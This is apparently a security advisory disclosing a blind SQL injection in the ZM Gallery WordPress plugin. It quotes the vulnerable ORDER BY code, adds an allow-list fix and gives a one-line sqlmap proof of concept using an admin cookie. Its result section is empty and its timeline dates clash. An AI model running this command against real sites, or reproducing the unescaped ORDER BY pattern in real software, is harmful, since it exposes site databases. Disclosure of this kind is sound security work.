ZM Gallery 1 WordPress Plugin – Blind SQL Injection

Homepage:

https://wordpress.org/plugins/zm-gallery/

Description:

Required user access: admin user.

$_GET['order'] (and $_GET['orderby']) are escaped incorrectly: esc_sql() only escapes characters for use inside a quoted string literal, while these values are interpolated unquoted into an ORDER BY clause, so the escaping does not prevent injection. Exploitable as blind SQL injection.

File / Code:

Path: /wp-content/plugin/zm-gallery/zm-gallery-list.php

Line: 126

// Vulnerable code as shipped: esc_sql() escapes quotes for use inside a string
// literal, but both values are interpolated unquoted into the ORDER BY clause.
if( isset($_GET['orderby']) ) {
    $order = ' ORDER BY ' . esc_sql($_GET['orderby']);

    if( isset($_GET['order']) ) {
        $order .= ' ' . esc_sql($_GET['order']);
    }
}

$table_name = $wpdb->prefix . 'zm_gallery';
// $order is appended directly to the query, so the request controls the tail of the SQL.
$gallery = $wpdb->get_results("SELECT * FROM $table_name " . $order );
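A hardened replacement for the clause above, added here as an example and not taken from the plugin: both the column and the direction are taken from an allow-list, so request input is never interpolated into the SQL. The allowed column names are an assumption, since the page does not give the zm_gallery table schema (only that orderby=name is valid).

```php
<?php
// Added example, not the plugin's own code. esc_sql() cannot protect an
// unquoted identifier or keyword, so the fix is validation, not escaping.

/**
 * Build a safe " ORDER BY `col` DIR" fragment from request parameters.
 * Returns '' when no allowed column is requested; unknown values are
 * rejected rather than escaped and interpolated.
 */
function zm_gallery_order_clause(array $get)
{
    // Assumed orderable columns; the real table schema is not on the page.
    static $allowed_columns = array('id', 'name');
    static $allowed_directions = array('ASC', 'DESC');

    if (!isset($get['orderby']) || !is_string($get['orderby'])) {
        return '';
    }
    $column = $get['orderby'];
    if (!in_array($column, $allowed_columns, true)) {
        return ''; // not an allowed column: ignore it entirely
    }

    $direction = 'ASC';
    if (isset($get['order']) && is_string($get['order'])) {
        $candidate = strtoupper($get['order']);
        if (in_array($candidate, $allowed_directions, true)) {
            $direction = $candidate;
        }
    }

    // Both parts are now literals from our own lists, never request input.
    return ' ORDER BY `' . $column . '` ' . $direction;
}

// Constructed sample requests: a legitimate sort and a malformed direction.
$benign  = array('orderby' => 'name', 'order' => 'desc');
$hostile = array('orderby' => 'name', 'order' => 'desc extra-text');

echo zm_gallery_order_clause($benign), PHP_EOL;   // falls through to DESC
echo zm_gallery_order_clause($hostile), PHP_EOL;  // direction rejected, ASC used
echo zm_gallery_order_clause(array('orderby' => 'x')), PHP_EOL; // empty string
```

In the plugin this fragment would replace the $order built above before the call to $wpdb->get_results(), leaving the rest of the query unchanged.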

Proof of Concept:

1 – Login with admin user.
2 – Use sqlmap;

python sqlmap.py -u "http://target/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=Mysql

3 – Result:

Timeline:

  • 14/12/2016 – Discovered
  • 13/12/2016 – Vendor not found
